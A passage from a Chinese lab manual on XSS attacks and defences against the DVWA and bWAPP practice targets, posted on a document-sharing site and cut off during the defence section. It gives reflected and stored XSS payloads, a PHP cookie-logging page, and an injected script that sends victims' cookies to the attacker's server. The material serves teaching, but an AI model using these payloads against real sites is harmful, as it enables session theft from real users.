實訓項目2:XSS跨站腳本點擊劫持分析及防護_第1頁
實訓項目2:XSS跨站腳本點擊劫持分析及防護_第2頁
實訓項目2:XSS跨站腳本點擊劫持分析及防護_第3頁
實訓項目2:XSS跨站腳本點擊劫持分析及防護_第4頁
實訓項目2:XSS跨站腳本點擊劫持分析及防護_第5頁
已閱讀5頁,還剩15頁未讀, 繼續(xù)免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

尋真求是格物致知信息安全發(fā)展態(tài)勢與知識拓展實訓項目指導手冊V1.0目錄TOC\o"1-2"\h\u30212XSS跨站腳本點擊劫持分析及防護 220884概述 232577實驗環(huán)境 28207前提條件 216212實驗流程 27914實驗目標 216549任務1反射型XSS漏洞利用 328655任務2存儲型XSS漏洞利用 625298任務3XSS漏洞防護 13

XSS跨站腳本點擊劫持分析及防護概述跨站腳本攻擊XSS(CrossSiteScripting)是惡意攻擊者往Web頁面里插入惡意Script代碼,當用戶瀏覽該頁之時,嵌入其中Web里面的Script代碼會被執(zhí)行,從而達到惡意攻擊用戶的目的。XSS攻擊針對的是用戶層面的攻擊,可以用來進行釣魚攻擊、前端js挖礦、用戶cookie獲取,甚至可以結合瀏覽器自身的漏洞對用戶主機進行遠程控制等。XSS跨站腳本攻擊分為三類:反射型XSS(reflected)、存儲型XSS(stored)、DOMBasedXSS。本實驗使用的靶場環(huán)境為:DVWA、bWAPP。實驗環(huán)境攻擊機:WindowsServer2016(01-Windows攻擊機),IP:30靶機:WindowsServer2016(03-Windows靶機),IP:56前提條件本實驗要求:熟悉Windows基本操作熟悉基本的PHP函數和HTML標簽實驗流程實驗目標完成本實驗后,您將能夠:掌握XSS漏洞基本利用方法掌握利用XSS獲取用戶cookie的方法掌握XSS漏洞的代碼級防護方法任務1反射型XSS漏洞利用【任務目標】構造XSS代碼,觸發(fā)反射型XSS攻擊,并通過反射型XSS漏洞,獲取用戶cookie信息。注:本實驗靶場為:DVWA。【任務步驟】靶機開啟網站環(huán)境在靶機上,運行PhpStudy網站環(huán)境。攻擊機訪問靶機DVWA站點在攻擊機打開瀏覽器訪問http://<靶機IP>/dvwa/login.php,賬號:admin,密碼:password設置安全等級在DVWA首頁,單擊左側菜單欄“DVWASecurity”,將安全等級設置為:low。訪問反射型XSS漏洞頁面在DVWA首頁,單擊左側菜單欄“XSS(Reflected)”,進入反射型XSS漏洞頁面。執(zhí)行攻擊測試構造XSS代碼:<script>alert(/xss/);</script>//該代碼含義為:執(zhí)行彈窗將代碼填寫到input輸入框中,并點擊“Submit”提交。頁面成功彈窗,說明攻擊代碼已被執(zhí)行。獲取用戶cookie 構造XSS代碼語句:<script>alert(document.cookie);</script>將代碼填寫到input輸入框中,并點擊“Submit”提交。頁面成功彈窗,并將當前用戶cookie信息顯示在彈窗中,說明成功獲取到用戶cookie信息。任務2存儲型XSS漏洞利用【任務目標】構造XSS代碼,觸發(fā)存儲型XSS攻擊,并通過存儲型XSS漏洞,獲取用戶cookie信息。注:本實驗靶場為:bWAPP?!救蝿詹襟E】訪問bWAPP頁面在攻擊機打開瀏覽器訪問http://<靶機IP>/bwapp/login.php,賬號:bee,密碼:bug,安全等級設置為:low。訪問存儲型XSS漏洞頁面在bWAPP首頁,單擊右側下拉框,選擇“Cross-SiteScripting-Stored(Blog)”并單擊“Hack”按鈕,進入存儲型XSS漏洞頁面。執(zhí)行攻擊測試構造XSS代碼:<script>alert(/xss/);</script>將代碼填寫到輸入框中并點擊“Submit”進行提交。提交成功,并且嵌入的代碼被執(zhí)行。此時,代碼已經成功被寫入到服務器中。因為代碼在服務器中永久保存,所以重新訪問該漏洞頁面,仍然會觸發(fā)XSS代碼。獲取其他用戶cookie(1)編寫獲取cookie值的頁面編寫一個可以獲取用戶cookie數值的頁面,并存放到服務器中,具體代碼如下:<?php$cook=$_GET['cookie']; //以GET方式獲取cookie$ip=$_SERVER['REMOTE_ADDR'];$time=$_SERVER['REQUEST_TIME'];$cookie=strchr($cook,'P'); //截取字符串$fp=fopen('cookie.txt','a'); //將數據寫入txt文本fwrite($fp,"IP:".$ip."\r\ncookie:".$cookie."\r\n");fclose($fp);?>將寫好的代碼文件存放到攻擊機的網站路徑中,并創(chuàng)建一個對應名稱的txt文檔,用來存放其他用戶的cookie信息。在攻擊機中,運行網站環(huán)境。打開瀏覽器,本地訪問獲取cookie的頁面。(2)構造XSS語句構造如下XSS語句,當用戶訪問存在此代碼的存儲頁面,即可獲取該用戶cookie信息:<script>document.write('<imgsrc="30/xss/cookie.php?cookie='+document.cookie+'">')</script>在XSS漏洞頁面填寫該代碼,并提交。代碼提交成功,接下來查看cookie.txt文件。可以看到,當前用戶cookie信息已經被寫入到txt文件中。因為代碼在服務器中永久保存,所以其他用戶訪問該頁面,同樣會獲取到對應用戶的cookie信息。任務3XSS漏洞防護【任務目標】通過在頁面中加入防護代碼,實現XSS漏洞的代碼級防護效果。本節(jié)實驗環(huán)境為:DVWA,安全等級low,防護頁面為:XSS(Reflected)?!救蝿詹襟E】黑名單過濾在C:\phpStudy\PHPTutorial\WWW\DVWA\vulnerabilities\xss_r\source下編輯low.php漏洞頁面,將<script>等關鍵詞添加到黑名單,代碼修改成如下圖所示:測試黑名單效果??梢钥吹剑?lt;script>的部分被替換為空,導致無法觸發(fā)攻擊彈窗效果。函數過濾編輯XSS漏洞頁面,在用戶提交的內容處,添加htmlspaci

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經權益所有人同意不得將文件中的內容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論